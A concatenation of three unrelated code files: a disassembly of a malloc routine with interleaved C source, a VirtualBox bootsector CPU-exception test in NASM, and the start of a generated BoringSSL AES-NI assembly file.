909: 8b 45 08 mov 0x8(%ebp),%eax
if((prevp = freep) == 0){
90c: 8b 15 60 0d 00 00 mov 0xd60,%edx
malloc(uint nbytes)
{
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
912: 8d 78 07 lea 0x7(%eax),%edi
915: c1 ef 03 shr $0x3,%edi
918: 83 c7 01 add $0x1,%edi
if((prevp = freep) == 0){
91b: 85 d2 test %edx,%edx
91d: 0f 84 a3 00 00 00 je 9c6 <malloc+0xc6>
923: 8b 02 mov (%edx),%eax
925: 8b 48 04 mov 0x4(%eax),%ecx
base.s.ptr = freep = prevp = &base;
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
if(p->s.size >= nunits){
928: 39 cf cmp %ecx,%edi
92a: 76 74 jbe 9a0 <malloc+0xa0>
92c: 81 ff 00 10 00 00 cmp $0x1000,%edi
932: be 00 10 00 00 mov $0x1000,%esi
937: 8d 1c fd 00 00 00 00 lea 0x0(,%edi,8),%ebx
93e: 0f 43 f7 cmovae %edi,%esi
941: ba 00 80 00 00 mov $0x8000,%edx
946: 81 ff ff 0f 00 00 cmp $0xfff,%edi
94c: 0f 46 da cmovbe %edx,%ebx
94f: eb 10 jmp 961 <malloc+0x61>
951: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
if((prevp = freep) == 0){
base.s.ptr = freep = prevp = &base;
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
958: 8b 02 mov (%edx),%eax
if(p->s.size >= nunits){
95a: 8b 48 04 mov 0x4(%eax),%ecx
95d: 39 cf cmp %ecx,%edi
95f: 76 3f jbe 9a0 <malloc+0xa0>
p->s.size = nunits;
}
freep = prevp;
return (void*)(p + 1);
}
if(p == freep)
961: 39 05 60 0d 00 00 cmp %eax,0xd60
967: 89 c2 mov %eax,%edx
969: 75 ed jne 958 <malloc+0x58>
char *p;
Header *hp;
if(nu < 4096)
nu = 4096;
p = sbrk(nu * sizeof(Header));
96b: 83 ec 0c sub $0xc,%esp
96e: 53 push %ebx
96f: e8 96 fc ff ff call 60a <sbrk>
if(p == (char*)-1)
974: 83 c4 10 add $0x10,%esp
977: 83 f8 ff cmp $0xffffffff,%eax
97a: 74 1c je 998 <malloc+0x98>
return 0;
hp = (Header*)p;
hp->s.size = nu;
97c: 89 70 04 mov %esi,0x4(%eax)
free((void*)(hp + 1));
97f: 83 ec 0c sub $0xc,%esp
982: 83 c0 08 add $0x8,%eax
985: 50 push %eax
986: e8 e5 fe ff ff call 870 <free>
return freep;
98b: 8b 15 60 0d 00 00 mov 0xd60,%edx
}
freep = prevp;
return (void*)(p + 1);
}
if(p == freep)
if((p = morecore(nunits)) == 0)
991: 83 c4 10 add $0x10,%esp
994: 85 d2 test %edx,%edx
996: 75 c0 jne 958 <malloc+0x58>
return 0;
998: 31 c0 xor %eax,%eax
99a: eb 1c jmp 9b8 <malloc+0xb8>
99c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
base.s.ptr = freep = prevp = &base;
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
if(p->s.size >= nunits){
if(p->s.size == nunits)
9a0: 39 cf cmp %ecx,%edi
9a2: 74 1c je 9c0 <malloc+0xc0>
prevp->s.ptr = p->s.ptr;
else {
p->s.size -= nunits;
9a4: 29 f9 sub %edi,%ecx
9a6: 89 48 04 mov %ecx,0x4(%eax)
p += p->s.size;
9a9: 8d 04 c8 lea (%eax,%ecx,8),%eax
p->s.size = nunits;
9ac: 89 78 04 mov %edi,0x4(%eax)
}
freep = prevp;
9af: 89 15 60 0d 00 00 mov %edx,0xd60
return (void*)(p + 1);
9b5: 83 c0 08 add $0x8,%eax
}
if(p == freep)
if((p = morecore(nunits)) == 0)
return 0;
}
}
9b8: 8d 65 f4 lea -0xc(%ebp),%esp
9bb: 5b pop %ebx
9bc: 5e pop %esi
9bd: 5f pop %edi
9be: 5d pop %ebp
9bf: c3 ret
base.s.size = 0;
}
for(p = prevp->s.ptr; ; prevp = p, p = p->s.ptr){
if(p->s.size >= nunits){
if(p->s.size == nunits)
prevp->s.ptr = p->s.ptr;
9c0: 8b 08 mov (%eax),%ecx
9c2: 89 0a mov %ecx,(%edx)
9c4: eb e9 jmp 9af <malloc+0xaf>
Header *p, *prevp;
uint nunits;
nunits = (nbytes + sizeof(Header) - 1)/sizeof(Header) + 1;
if((prevp = freep) == 0){
base.s.ptr = freep = prevp = &base;
9c6: c7 05 60 0d 00 00 64 movl $0xd64,0xd60
9cd: 0d 00 00
9d0: c7 05 64 0d 00 00 64 movl $0xd64,0xd64
9d7: 0d 00 00
base.s.size = 0;
9da: b8 64 0d 00 00 mov $0xd64,%eax
9df: c7 05 68 0d 00 00 00 movl $0x0,0xd68
9e6: 00 00 00
9e9: e9 3e ff ff ff jmp 92c <malloc+0x2c>
|
; $Id: bootsector2-cpu-xcpt-1.asm $
;; @file
; Bootsector test for basic exception stuff.
;
; Recommended (but not necessary):
; VBoxManage setextradata bs-cpu-xcpt-1 VBoxInternal/Devices/VMMDev/0/Config/TestingEnabled 1
;
;
; Copyright (C) 2007-2015 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it and/or modify it under the terms of the GNU
; General Public License (GPL) as published by the Free Software
; Foundation, in version 2 as it comes in the "COPYING" file of the
; VirtualBox OSE distribution. VirtualBox OSE is distributed in the
; hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
;
; The contents of this file may alternatively be used under the terms
; of the Common Development and Distribution License Version 1.0
; (CDDL) only, as it comes in the "COPYING.CDDL" file of the
; VirtualBox OSE distribution, in which case the provisions of the
; CDDL are applicable instead of those of the GPL.
;
; You may elect to license modified versions of this file under the
; terms and conditions of either the GPL or the CDDL or both.
;
;*******************************************************************************
;* Header Files *
;*******************************************************************************
%include "iprt/asmdefs.mac"
%include "iprt/x86.mac"
%include "VBox/VMMDevTesting.mac"
;*******************************************************************************
;* Defined Constants And Macros *
;*******************************************************************************
;; Base address at which we can start testing page tables and page directories.
%define TST_SCRATCH_PD_BASE BS2_MUCK_ABOUT_BASE
;; Base address at which we can start testing the page pointer table.
%define TST_SCRATCH_PDPT_BASE (1 << X86_PDPT_SHIFT)
;; Base address at which we can start testing the page map level 4.
%define TST_SCRATCH_PML4_BASE ((1 << X86_PML4_SHIFT) + TST_SCRATCH_PD_BASE)
;
; Include and execute the init code.
;
%define BS2_INIT_RM
%define BS2_WITH_TRAPS
%define BS2_INC_RM
%define BS2_INC_PE16
%define BS2_INC_PE32
%define BS2_INC_PP16
%define BS2_INC_PP32
%define BS2_INC_PAE16
%define BS2_INC_PAE32
%define BS2_INC_LM16
%define BS2_INC_LM32
%define BS2_INC_LM64
%define BS2_WITH_TRAPRECS
%include "bootsector2-common-init-code.mac"
;
; The main() function.
;
BEGINPROC main
BITS 16
;
; Test prologue.
;
mov ax, .s_szTstName
call TestInit_r86
call Bs2EnableA20_r86
;
; Execute the tests
;
%if 1
call NAME(DoTestsForMode_rm_pe32)
%endif
%if 1
call NAME(DoTestsForMode_rm_pp32)
%endif
%if 1
call NAME(DoTestsForMode_rm_pae32)
%endif
%if 1
call NAME(DoTestsForMode_rm_lm64)
%endif
;
; We're done.
;
call TestTerm_r86
ret
.s_szTstName:
db 'tstCpuXcpt1', 0
ENDPROC main
;
; Instantiate the template code.
;
%include "bootsector2-template-footer.mac" ; reset the initial environemnt.
%define TMPL_PE32
%include "bootsector2-cpu-xcpt-1-template.mac"
%define TMPL_PP32
%include "bootsector2-cpu-xcpt-1-template.mac"
%define TMPL_PAE32
%include "bootsector2-cpu-xcpt-1-template.mac"
%define TMPL_LM64
%include "bootsector2-cpu-xcpt-1-template.mac"
;
; End sections and image.
;
%include "bootsector2-common-end.mac"
|
; This file is generated from a similarly-named Perl script in the BoringSSL
; source tree. Do not edit by hand.
%ifdef BORINGSSL_PREFIX
%include "boringssl_prefix_symbols_nasm.inc"
%endif
%ifidn __OUTPUT_FORMAT__,obj
section code use32 class=code align=64
%elifidn __OUTPUT_FORMAT__,win32
%ifdef __YASM_VERSION_ID__
%if __YASM_VERSION_ID__ < 01010000h
%error yasm version 1.1.0 or later needed.
%endif
; Yasm automatically includes .00 and complains about redefining it.
; https://www.tortall.net/projects/yasm/manual/html/objfmt-win32-safeseh.html
%else
$@feat.00 equ 1
%endif
section .text code align=64
%else
section .text code
%endif
;extern _OPENSSL_ia32cap_P
%ifndef NDEBUG
extern _BORINGSSL_function_hit
%endif
global _aes_hw_encrypt
align 16
_aes_hw_encrypt:
L$_aes_hw_encrypt_begin:
%ifndef NDEBUG
push ebx
push edx
call L$000pic
L$000pic:
pop ebx
lea ebx,[(_BORINGSSL_function_hit+1-L$000pic)+ebx]
mov edx,1
mov BYTE [ebx],dl
pop edx
pop ebx
%endif
mov eax,DWORD [4+esp]
mov edx,DWORD [12+esp]
movups xmm2,[eax]
mov ecx,DWORD [240+edx]
mov eax,DWORD [8+esp]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$001enc1_loop_1:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$001enc1_loop_1
db 102,15,56,221,209
pxor xmm0,xmm0
pxor xmm1,xmm1
movups [eax],xmm2
pxor xmm2,xmm2
ret
global _aes_hw_decrypt
align 16
_aes_hw_decrypt:
L$_aes_hw_decrypt_begin:
mov eax,DWORD [4+esp]
mov edx,DWORD [12+esp]
movups xmm2,[eax]
mov ecx,DWORD [240+edx]
mov eax,DWORD [8+esp]
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$002dec1_loop_2:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$002dec1_loop_2
db 102,15,56,223,209
pxor xmm0,xmm0
pxor xmm1,xmm1
movups [eax],xmm2
pxor xmm2,xmm2
ret
align 16
__aesni_encrypt2:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$003enc2_loop:
db 102,15,56,220,209
db 102,15,56,220,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$003enc2_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,221,208
db 102,15,56,221,216
ret
align 16
__aesni_decrypt2:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$004dec2_loop:
db 102,15,56,222,209
db 102,15,56,222,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$004dec2_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,223,208
db 102,15,56,223,216
ret
align 16
__aesni_encrypt3:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$005enc3_loop:
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
db 102,15,56,220,224
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$005enc3_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,221,208
db 102,15,56,221,216
db 102,15,56,221,224
ret
align 16
__aesni_decrypt3:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
add ecx,16
L$006dec3_loop:
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
db 102,15,56,222,224
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$006dec3_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,223,208
db 102,15,56,223,216
db 102,15,56,223,224
ret
align 16
__aesni_encrypt4:
movups xmm0,[edx]
movups xmm1,[16+edx]
shl ecx,4
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
pxor xmm5,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
db 15,31,64,0
add ecx,16
L$007enc4_loop:
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,220,233
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
db 102,15,56,220,224
db 102,15,56,220,232
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$007enc4_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,221,208
db 102,15,56,221,216
db 102,15,56,221,224
db 102,15,56,221,232
ret
align 16
__aesni_decrypt4:
movups xmm0,[edx]
movups xmm1,[16+edx]
shl ecx,4
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
pxor xmm5,xmm0
movups xmm0,[32+edx]
lea edx,[32+ecx*1+edx]
neg ecx
db 15,31,64,0
add ecx,16
L$008dec4_loop:
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,222,233
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
db 102,15,56,222,224
db 102,15,56,222,232
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$008dec4_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,222,233
db 102,15,56,223,208
db 102,15,56,223,216
db 102,15,56,223,224
db 102,15,56,223,232
ret
align 16
__aesni_encrypt6:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
db 102,15,56,220,209
pxor xmm5,xmm0
pxor xmm6,xmm0
db 102,15,56,220,217
lea edx,[32+ecx*1+edx]
neg ecx
db 102,15,56,220,225
pxor xmm7,xmm0
movups xmm0,[ecx*1+edx]
add ecx,16
jmp NEAR L$009_aesni_encrypt6_inner
align 16
L$010enc6_loop:
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
L$009_aesni_encrypt6_inner:
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
L$_aesni_encrypt6_enter:
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
db 102,15,56,220,224
db 102,15,56,220,232
db 102,15,56,220,240
db 102,15,56,220,248
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$010enc6_loop
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,220,225
db 102,15,56,220,233
db 102,15,56,220,241
db 102,15,56,220,249
db 102,15,56,221,208
db 102,15,56,221,216
db 102,15,56,221,224
db 102,15,56,221,232
db 102,15,56,221,240
db 102,15,56,221,248
ret
align 16
__aesni_decrypt6:
movups xmm0,[edx]
shl ecx,4
movups xmm1,[16+edx]
xorps xmm2,xmm0
pxor xmm3,xmm0
pxor xmm4,xmm0
db 102,15,56,222,209
pxor xmm5,xmm0
pxor xmm6,xmm0
db 102,15,56,222,217
lea edx,[32+ecx*1+edx]
neg ecx
db 102,15,56,222,225
pxor xmm7,xmm0
movups xmm0,[ecx*1+edx]
add ecx,16
jmp NEAR L$011_aesni_decrypt6_inner
align 16
L$012dec6_loop:
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
L$011_aesni_decrypt6_inner:
db 102,15,56,222,233
db 102,15,56,222,241
db 102,15,56,222,249
L$_aesni_decrypt6_enter:
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,222,208
db 102,15,56,222,216
db 102,15,56,222,224
db 102,15,56,222,232
db 102,15,56,222,240
db 102,15,56,222,248
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$012dec6_loop
db 102,15,56,222,209
db 102,15,56,222,217
db 102,15,56,222,225
db 102,15,56,222,233
db 102,15,56,222,241
db 102,15,56,222,249
db 102,15,56,223,208
db 102,15,56,223,216
db 102,15,56,223,224
db 102,15,56,223,232
db 102,15,56,223,240
db 102,15,56,223,248
ret
global _aes_hw_ecb_encrypt
align 16
_aes_hw_ecb_encrypt:
L$_aes_hw_ecb_encrypt_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
and eax,-16
jz NEAR L$013ecb_ret
mov ecx,DWORD [240+edx]
test ebx,ebx
jz NEAR L$014ecb_decrypt
mov ebp,edx
mov ebx,ecx
cmp eax,96
jb NEAR L$015ecb_enc_tail
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
movdqu xmm5,[48+esi]
movdqu xmm6,[64+esi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
sub eax,96
jmp NEAR L$016ecb_enc_loop6_enter
align 16
L$017ecb_enc_loop6:
movups [edi],xmm2
movdqu xmm2,[esi]
movups [16+edi],xmm3
movdqu xmm3,[16+esi]
movups [32+edi],xmm4
movdqu xmm4,[32+esi]
movups [48+edi],xmm5
movdqu xmm5,[48+esi]
movups [64+edi],xmm6
movdqu xmm6,[64+esi]
movups [80+edi],xmm7
lea edi,[96+edi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
L$016ecb_enc_loop6_enter:
call __aesni_encrypt6
mov edx,ebp
mov ecx,ebx
sub eax,96
jnc NEAR L$017ecb_enc_loop6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
movups [80+edi],xmm7
lea edi,[96+edi]
add eax,96
jz NEAR L$013ecb_ret
L$015ecb_enc_tail:
movups xmm2,[esi]
cmp eax,32
jb NEAR L$018ecb_enc_one
movups xmm3,[16+esi]
je NEAR L$019ecb_enc_two
movups xmm4,[32+esi]
cmp eax,64
jb NEAR L$020ecb_enc_three
movups xmm5,[48+esi]
je NEAR L$021ecb_enc_four
movups xmm6,[64+esi]
xorps xmm7,xmm7
call __aesni_encrypt6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
jmp NEAR L$013ecb_ret
align 16
L$018ecb_enc_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$022enc1_loop_3:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$022enc1_loop_3
db 102,15,56,221,209
movups [edi],xmm2
jmp NEAR L$013ecb_ret
align 16
L$019ecb_enc_two:
call __aesni_encrypt2
movups [edi],xmm2
movups [16+edi],xmm3
jmp NEAR L$013ecb_ret
align 16
L$020ecb_enc_three:
call __aesni_encrypt3
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
jmp NEAR L$013ecb_ret
align 16
L$021ecb_enc_four:
call __aesni_encrypt4
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
jmp NEAR L$013ecb_ret
align 16
L$014ecb_decrypt:
mov ebp,edx
mov ebx,ecx
cmp eax,96
jb NEAR L$023ecb_dec_tail
movdqu xmm2,[esi]
movdqu xmm3,[16+esi]
movdqu xmm4,[32+esi]
movdqu xmm5,[48+esi]
movdqu xmm6,[64+esi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
sub eax,96
jmp NEAR L$024ecb_dec_loop6_enter
align 16
L$025ecb_dec_loop6:
movups [edi],xmm2
movdqu xmm2,[esi]
movups [16+edi],xmm3
movdqu xmm3,[16+esi]
movups [32+edi],xmm4
movdqu xmm4,[32+esi]
movups [48+edi],xmm5
movdqu xmm5,[48+esi]
movups [64+edi],xmm6
movdqu xmm6,[64+esi]
movups [80+edi],xmm7
lea edi,[96+edi]
movdqu xmm7,[80+esi]
lea esi,[96+esi]
L$024ecb_dec_loop6_enter:
call __aesni_decrypt6
mov edx,ebp
mov ecx,ebx
sub eax,96
jnc NEAR L$025ecb_dec_loop6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
movups [80+edi],xmm7
lea edi,[96+edi]
add eax,96
jz NEAR L$013ecb_ret
L$023ecb_dec_tail:
movups xmm2,[esi]
cmp eax,32
jb NEAR L$026ecb_dec_one
movups xmm3,[16+esi]
je NEAR L$027ecb_dec_two
movups xmm4,[32+esi]
cmp eax,64
jb NEAR L$028ecb_dec_three
movups xmm5,[48+esi]
je NEAR L$029ecb_dec_four
movups xmm6,[64+esi]
xorps xmm7,xmm7
call __aesni_decrypt6
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
movups [64+edi],xmm6
jmp NEAR L$013ecb_ret
align 16
L$026ecb_dec_one:
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$030dec1_loop_4:
db 102,15,56,222,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$030dec1_loop_4
db 102,15,56,223,209
movups [edi],xmm2
jmp NEAR L$013ecb_ret
align 16
L$027ecb_dec_two:
call __aesni_decrypt2
movups [edi],xmm2
movups [16+edi],xmm3
jmp NEAR L$013ecb_ret
align 16
L$028ecb_dec_three:
call __aesni_decrypt3
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
jmp NEAR L$013ecb_ret
align 16
L$029ecb_dec_four:
call __aesni_decrypt4
movups [edi],xmm2
movups [16+edi],xmm3
movups [32+edi],xmm4
movups [48+edi],xmm5
L$013ecb_ret:
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
pxor xmm7,xmm7
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_ccm64_encrypt_blocks
align 16
_aes_hw_ccm64_encrypt_blocks:
L$_aes_hw_ccm64_encrypt_blocks_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
mov ecx,DWORD [40+esp]
mov ebp,esp
sub esp,60
and esp,-16
mov DWORD [48+esp],ebp
movdqu xmm7,[ebx]
movdqu xmm3,[ecx]
mov ecx,DWORD [240+edx]
mov DWORD [esp],202182159
mov DWORD [4+esp],134810123
mov DWORD [8+esp],67438087
mov DWORD [12+esp],66051
mov ebx,1
xor ebp,ebp
mov DWORD [16+esp],ebx
mov DWORD [20+esp],ebp
mov DWORD [24+esp],ebp
mov DWORD [28+esp],ebp
shl ecx,4
mov ebx,16
lea ebp,[edx]
movdqa xmm5,[esp]
movdqa xmm2,xmm7
lea edx,[32+ecx*1+edx]
sub ebx,ecx
db 102,15,56,0,253
L$031ccm64_enc_outer:
movups xmm0,[ebp]
mov ecx,ebx
movups xmm6,[esi]
xorps xmm2,xmm0
movups xmm1,[16+ebp]
xorps xmm0,xmm6
xorps xmm3,xmm0
movups xmm0,[32+ebp]
L$032ccm64_enc2_loop:
db 102,15,56,220,209
db 102,15,56,220,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$032ccm64_enc2_loop
db 102,15,56,220,209
db 102,15,56,220,217
paddq xmm7,[16+esp]
dec eax
db 102,15,56,221,208
db 102,15,56,221,216
lea esi,[16+esi]
xorps xmm6,xmm2
movdqa xmm2,xmm7
movups [edi],xmm6
db 102,15,56,0,213
lea edi,[16+edi]
jnz NEAR L$031ccm64_enc_outer
mov esp,DWORD [48+esp]
mov edi,DWORD [40+esp]
movups [edi],xmm3
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
pxor xmm7,xmm7
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_ccm64_decrypt_blocks
align 16
_aes_hw_ccm64_decrypt_blocks:
L$_aes_hw_ccm64_decrypt_blocks_begin:
push ebp
push ebx
push esi
push edi
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
mov ecx,DWORD [40+esp]
mov ebp,esp
sub esp,60
and esp,-16
mov DWORD [48+esp],ebp
movdqu xmm7,[ebx]
movdqu xmm3,[ecx]
mov ecx,DWORD [240+edx]
mov DWORD [esp],202182159
mov DWORD [4+esp],134810123
mov DWORD [8+esp],67438087
mov DWORD [12+esp],66051
mov ebx,1
xor ebp,ebp
mov DWORD [16+esp],ebx
mov DWORD [20+esp],ebp
mov DWORD [24+esp],ebp
mov DWORD [28+esp],ebp
movdqa xmm5,[esp]
movdqa xmm2,xmm7
mov ebp,edx
mov ebx,ecx
db 102,15,56,0,253
movups xmm0,[edx]
movups xmm1,[16+edx]
lea edx,[32+edx]
xorps xmm2,xmm0
L$033enc1_loop_5:
db 102,15,56,220,209
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$033enc1_loop_5
db 102,15,56,221,209
shl ebx,4
mov ecx,16
movups xmm6,[esi]
paddq xmm7,[16+esp]
lea esi,[16+esi]
sub ecx,ebx
lea edx,[32+ebx*1+ebp]
mov ebx,ecx
jmp NEAR L$034ccm64_dec_outer
align 16
L$034ccm64_dec_outer:
xorps xmm6,xmm2
movdqa xmm2,xmm7
movups [edi],xmm6
lea edi,[16+edi]
db 102,15,56,0,213
sub eax,1
jz NEAR L$035ccm64_dec_break
movups xmm0,[ebp]
mov ecx,ebx
movups xmm1,[16+ebp]
xorps xmm6,xmm0
xorps xmm2,xmm0
xorps xmm3,xmm6
movups xmm0,[32+ebp]
L$036ccm64_dec2_loop:
db 102,15,56,220,209
db 102,15,56,220,217
movups xmm1,[ecx*1+edx]
add ecx,32
db 102,15,56,220,208
db 102,15,56,220,216
movups xmm0,[ecx*1+edx-16]
jnz NEAR L$036ccm64_dec2_loop
movups xmm6,[esi]
paddq xmm7,[16+esp]
db 102,15,56,220,209
db 102,15,56,220,217
db 102,15,56,221,208
db 102,15,56,221,216
lea esi,[16+esi]
jmp NEAR L$034ccm64_dec_outer
align 16
L$035ccm64_dec_break:
mov ecx,DWORD [240+ebp]
mov edx,ebp
movups xmm0,[edx]
movups xmm1,[16+edx]
xorps xmm6,xmm0
lea edx,[32+edx]
xorps xmm3,xmm6
L$037enc1_loop_6:
db 102,15,56,220,217
dec ecx
movups xmm1,[edx]
lea edx,[16+edx]
jnz NEAR L$037enc1_loop_6
db 102,15,56,221,217
mov esp,DWORD [48+esp]
mov edi,DWORD [40+esp]
movups [edi],xmm3
pxor xmm0,xmm0
pxor xmm1,xmm1
pxor xmm2,xmm2
pxor xmm3,xmm3
pxor xmm4,xmm4
pxor xmm5,xmm5
pxor xmm6,xmm6
pxor xmm7,xmm7
pop edi
pop esi
pop ebx
pop ebp
ret
global _aes_hw_ctr32_encrypt_blocks
align 16
_aes_hw_ctr32_encrypt_blocks:
L$_aes_hw_ctr32_encrypt_blocks_begin:
push ebp
push ebx
push esi
push edi
%ifndef NDEBUG
push ebx
push edx
call L$038pic
L$038pic:
pop ebx
lea ebx,[(_BORINGSSL_function_hit+0-L$038pic)+ebx]
mov edx,1
mov BYTE [ebx],dl
pop edx
pop ebx
%endif
mov esi,DWORD [20+esp]
mov edi,DWORD [24+esp]
mov eax,DWORD [28+esp]
mov edx,DWORD [32+esp]
mov ebx,DWORD [36+esp]
mov ebp,esp
sub esp,88
and esp,-16
mov DWORD [80+esp],ebp
cmp eax,1
je NEAR L$039ctr32_one_shortcut
movdqu xmm7,[ebx]
mov DWORD [esp],202182159
mov DWORD [4+esp],134810123
mov DWORD [8+esp],67438087
mov DWORD [12+esp],66051
mov ecx,6
xor ebp,ebp
mov DWORD [16+esp],ecx
mov DWORD [20+esp],ecx
mov DWORD [24+esp],ecx
mov DWORD [28+esp],ebp
db 102,15,58,22,251,3
db 102,15,58,34,253,3
mov ecx,DWORD [240+edx]
bswap ebx
pxor xmm0,xmm0
pxor xmm1,xmm1
movdqa xmm2,[esp]
db 102,15,58,34,195,0
lea ebp,[3+ebx]
db 102,15,58,34,205,0
inc ebx
db 102,15,58,34,195,1
inc ebp
db 102,15,58,34,205,1
inc ebx
db 102,15,58,34,195,2
inc ebp
db 102,15,58,34,205,2
movdqa [48+esp],xmm0
db 102,15,56,0,194
movdqu xmm6,[edx]
movdqa [64+esp],xmm1
db 102,15,56,0,202
pshufd xmm2,xmm0,192
pshufd xmm3,xmm0,128
cmp eax,6
jb NEAR L$040ctr32_tail
